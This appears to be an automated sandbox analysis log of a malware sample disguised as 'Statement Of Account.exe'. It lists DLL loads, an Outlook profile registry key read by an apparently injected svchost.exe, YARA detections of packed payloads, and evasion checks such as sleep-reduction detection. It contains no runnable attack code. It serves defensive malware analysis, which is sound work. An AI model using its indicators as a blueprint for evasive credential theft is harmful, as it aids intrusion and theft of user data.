Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,

0_2_0040EB70

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004171D1 push ecx; ret	0_2_004171E4
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004171D1 push ecx; ret	3_2_004171E4
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 5_2_03C7E808 push edx; ret	5_2_03C7E812
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 5_2_03C7EA31 push esp; retf	5_2_03C7EA32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00402AC0 push eax; ret	10_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00402AC0 push eax; ret	10_2_00402AFC

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 10_2_00123360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

10_2_00123360

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_004772DE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_004375B0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	3_2_004772DE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,	3_2_004375B0

Source: C:\Users\user\Desktop\Statement Of Account.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00444078		0_2_00444078
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00444078		3_2_00444078

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Statement Of Account.exe	API/Special instruction interceptor: Address: 3E4EE5C
Source: C:\Users\user\Desktop\Statement Of Account.exe	API/Special instruction interceptor: Address: 3D5BE4C
Source: C:\Users\user\Desktop\Statement Of Account.exe	API/Special instruction interceptor: Address: 3C7E22C
Source: C:\Users\user\Desktop\Statement Of Account.exe	API/Special instruction interceptor: Address: 3E2BE5C
Source: C:\Users\user\Desktop\Statement Of Account.exe	API/Special instruction interceptor: Address: 3D7C224

Source: C:\Users\user\Desktop\Statement Of Account.exe	API coverage: 3.3 %
Source: C:\Users\user\Desktop\Statement Of Account.exe	API coverage: 3.2 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 1476

Thread sleep time: -600000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	0_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0045DD7C FindFirstFileW,FindClose,	0_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	0_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	3_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	3_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0045DD7C FindFirstFileW,FindClose,	3_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	3_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	3_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_0044BF8D
